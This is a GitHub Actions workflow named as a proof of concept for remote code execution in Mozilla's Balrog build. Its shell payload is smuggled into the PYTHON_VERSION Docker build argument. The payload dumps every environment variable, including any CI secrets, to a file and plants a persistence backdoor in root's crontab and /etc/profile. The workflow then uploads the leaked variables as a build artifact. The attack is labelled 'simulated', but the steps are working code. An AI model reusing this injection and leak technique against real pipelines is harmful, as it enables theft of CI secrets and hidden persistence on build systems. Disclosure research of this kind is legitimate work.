name: Mozilla Balrog RCE Leak PoC

on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Prepare Docker Context
        run: |
          mkdir -p ./taskcluster/docker/python
          cp .github/workflows/Dockerfile ./taskcluster/docker/python/Dockerfile

          PAYLOAD=$(cat <<'EOF'
          echo "[*] Collecting sensitive CI environment variables..."
          printenv > /leaked.txt

          echo "[*] Installing a runtime backdoor (simulated)..."
          echo '#!/bin/sh' > /usr/local/bin/init.sh
          echo 'echo "[*] Runtime triggered" >> /runtime.log' >> /usr/local/bin/init.sh
          echo 'printenv >> /runtime.log' >> /usr/local/bin/init.sh
          chmod +x /usr/local/bin/init.sh
          echo '@reboot /usr/local/bin/init.sh' >> /etc/crontabs/root
          echo '/usr/local/bin/init.sh' >> /etc/profile
          EOF
          )

          docker build \
            --build-arg PYTHON_VERSION="$PAYLOAD" \
            -t backdoored ./taskcluster/docker/python

          docker run --rm backdoored cat /leaked.txt > output.txt

      - name: Upload Leak Simulation
        uses: actions/upload-artifact@v4
        with:
          name: simulated-leak
          path: output.txt
